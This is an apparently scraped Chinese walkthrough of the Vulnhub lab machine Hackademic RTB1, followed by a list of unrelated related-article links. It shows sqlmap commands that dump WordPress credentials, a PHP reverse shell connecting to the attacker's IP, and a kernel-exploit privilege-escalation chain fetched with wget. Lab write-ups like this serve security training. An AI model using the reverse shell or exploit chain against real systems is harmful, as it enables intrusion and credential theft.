当前位置: 首页 > news >正文

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup

靶机介绍
官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/
在这里插入图片描述
需要读取靶机的root目录下key.txt
运行环境:
虚拟机网络设置的是NAT模式
靶机:IP地址:192.168.233.131
攻击机:kali linux,IP地址:192.168.233.129

信息收集

获取靶机IP地址

image-20230703153927729

进入靶机

image​​

用wappalyzer查看用到技术

image

查看开放的端口

image-20230703173946936

扫敏感目录

nikto -h http://192.168.233.131
dirb http://192.168.233.131/Hackademic_RTB1/
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html -u http://192.168.233.131

image-20230703192555811

image-20230703192845503

漏洞利用

web端寻找漏洞,php页面,f12代码注入,sql注入

image-20230703194526935

sqlmap注入

sqlmap -u http://192.168.243.128/Hackademic_RTB1/?cat=1 --dbs --batch

image-20230703202147050

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress --tables --batch

image-20230703202222352

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users --columns --batch

image-20230703202309068

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users -C user_login,user_pass --dump --batch

image-20230703202333804

GeorgeMiller、q1w2e3登录

image-20230703203518703

getshell

shell.php

<div>
<?php
$sock = fsockopen('192.168.233.129','8888');
$descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock);
$peocess = proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
?>
</div>

上传shell

image-20230703203557858

image-20230703204739867

kali打开监听

image-20230703204343618

运行反弹shell

image-20230703204715657

反弹shell成功

image-20230703204816477

提权

找敏感信息

查权限文件

find / -user root -perm /4000 2>/dev/null
根目录     用户权限set uid   f文件类型,没有f会有目录

image-20230703210505136​搜索内核漏洞

searchsploit 2.6.31

image-20230703210917302

下载到本地searchsploit -m 15285.c

image-20230703211758478​kali开启web服务器

image-20230703212054869

在靶机中下载

wget http://192.168.233.129/15285.c

wget ip地址/文件名

image-20230703212607768

编译脚本

gcc 15285.c -o exp

image-20230703213015682

将编译的exp赋予执行权限并执行exp

image-20230703213406686

提权成功id为0

image-20230703213620621

http://www.lryc.cn/news/153688.html

相关文章:

  • idea使用maven时的java.lang.IllegalArgumentException: Malformed \uxxxx encoding问题解决
  • linux深入理解多进程间通信
  • 使用自定义注解+aop实现公共字段的填充
  • Unity 安卓(Android)端AVProVideo插件播放不了视频,屏幕一闪一闪的
  • 无涯教程-JavaScript - DMIN函数
  • GaussDB数据库SQL系列-层次递归查询
  • pycharm 下jupyter noteobook显示黑白图片不正常
  • Java异常(Error与Exception)与常见异常处理——第八讲
  • 【JAVA】多态
  • android 12 第三方apk系统签名
  • 【论文阅读】自动驾驶中车道检测系统的物理后门攻击
  • ArrayList、LinkedList、Collections.singletonList、Arrays.asList与ImmutableList.of
  • 恒运资本:沪指涨逾1%,金融、地产等板块走强,北向资金净买入超60亿元
  • 解决WebSocket通信:前端拿不到最后一条数据的问题
  • 【java】[maven]每次创建一个maven模块时java compiler版本就是1.6与实际版本不一致(解决本质问题)
  • GPT-5继续秘密训练中!ChatGPT开学大礼包
  • 3.2.0 终极预告!云原生支持新增 Spark on k8S 支持
  • Flutter状态管理 — 探索Flutter中的状态
  • Python中重要的条件语句教程
  • 记录一下自己对linux分区挂载的理解
  • 【机器学习】人工智能概述(文末送书)
  • 电子学会 2023年3月 青少年软件编程Python编程等级考试三级真题解析(选择题+判断题+编程题)
  • C++算法 —— 动态规划(1)斐波那契数列模型
  • Elasticsearch 对比传统数据库:深入挖掘 Elasticsearch 的优势
  • ICG-Tetrazine的合成方法和步骤-星戈瑞
  • C ++ 学习之分文件 实现类
  • vue+elementui前端rules校验缓存问题
  • 使用Vue3和Vite升级你的Vue2+Webpack项目
  • WebSocket 协议及其使用案例
  • Java应用CPU占用过高故障排除